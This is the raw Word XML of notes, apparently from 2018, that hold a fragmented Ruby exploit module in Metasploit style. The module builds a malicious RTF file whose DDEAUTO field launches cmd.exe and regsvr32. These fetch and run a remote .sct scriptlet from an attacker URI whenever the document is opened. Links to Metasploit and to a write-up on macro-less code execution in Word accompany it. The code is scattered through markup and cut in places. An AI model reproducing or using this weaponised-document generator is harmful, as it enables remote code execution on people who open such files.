        <w:t>if ::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>File.file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?(path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF53018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  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>File.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(path, ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’) do |</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C42DD2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    header = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fd.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fd.stat.size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).split(‘{\*\datastore’).first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2B62E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    header = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>header.to_s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="577F3A0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    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>print_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“Injecting #{path}…”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E1D1D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  return header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603D1BB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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E500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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74309D4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header = ‘{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\fonttbl{\f0\fnil\fcharset0 Calibri;}}’ + “\n”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F190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  header &lt;&lt; ‘{\*\generator Riched20 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6.3.9600}\viewkind4\uc1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>′ + “\n”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464089E5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  header &lt;&lt; ‘\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\sa200\sl276\slmult1\f0\fs22\lang9′ + “\n”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F6FA4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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ED02D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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C93962C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lastRenderedPageBreak/>
        <w:t>      header = ‘{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\fonttbl{\f0\fnil\fcharset0 Calibri;}}’ + “\n”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5178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  header &lt;&lt; ‘{\*\generator Riched20 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6.3.9600}\viewkind4\uc1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>′ + “\n”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0994D5CA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  header &lt;&lt; ‘\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\sa200\sl276\slmult1\f0\fs22\lang9′ + “\n”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDA52E4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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAACA9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return header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522C0EC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7F3FBA09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4AD0F1FE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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>create_rtf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CE0678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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F0801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header = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>retrieve_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(datastore['FILENAME'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406F726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field_class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ‘{\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>field{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\*\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fldinst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> {\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rtlch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\fcs1 \af31507 \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ltrch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\fcs0 \insrsid3807165  ‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E840CF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field_class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; “DDEAUTO C:\\\\\\\\Programs\\\\\\\\Microsoft\\\\\\\\Office\\\\\\\\MSword.exe\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe \”/c regsvr32 /s /n /u /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>get_uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> scrobj.dll\” }}”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF33B9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field_class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; ‘{\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fldrslt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> }}\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sectd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ltrsect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\linex0\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>endnhere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\sectlinegrid360\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sectdefaultcl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sftnbj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> {\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rtlch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\fcs1 \af31507 \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ltrch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\fcs0′ + “\n”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60432A5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field_class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; ‘\insrsid5790315′ + “\n”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBB1A1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field_class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; ‘\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>par }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E52586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footer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=  ‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}}’ # footer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DD437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rtf = header + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>field_class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + footer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B73335B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  rtf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D860A32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3A41D55D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA3294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def primer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30735020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 xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>file_create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>create_rtf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D5B277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  end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2C6D13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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226156AF" w14:textId="77777777" w:rsidR="006733E8" w:rsidRPr="00A54903" w:rsidRDefault="006733E8" w:rsidP="00A54903">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#  #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CE74C4" w14:textId="4E4798C7" w:rsidR="00913CD6" w:rsidRPr="00913CD6" w:rsidRDefault="00913CD6" w:rsidP="00610CBF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00913CD6" w:rsidRPr="0091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EB"/>
    <w:rsid w:val="0036204E"/>
    <w:rsid w:val="004F2C3C"/>
    <w:rsid w:val="004F7781"/>
    <w:rsid w:val="00610CBF"/>
    <w:rsid w:val="006733E8"/>
    <w:rsid w:val="00913CD6"/>
    <w:rsid w:val="00A47866"/>
    <w:rsid w:val="00A54903"/>
    <w:rsid w:val="00B26EC5"/>
    <w:rsid w:val="00F16AEB"/>
    <w:rsid w:val="00F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595"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{06F03FE8-0B57-4E89-BA4B-8BC8F179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7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7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781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4F7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F778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610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0C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0CB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10CBF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-literal">
    <w:name w:val="hljs-literal"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00610CBF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-variable">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00610CBF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00610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etasploit.com/download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dj.co.id/hjergf76" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sensepost.com/blog/2017/macro-less-code-exec-in-msword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gist.github.com/xillwillx/171c24c8e23512a891910824f506f563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github.com/rapid7/metasploit-frame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2018-01-02T05:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-02T06:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>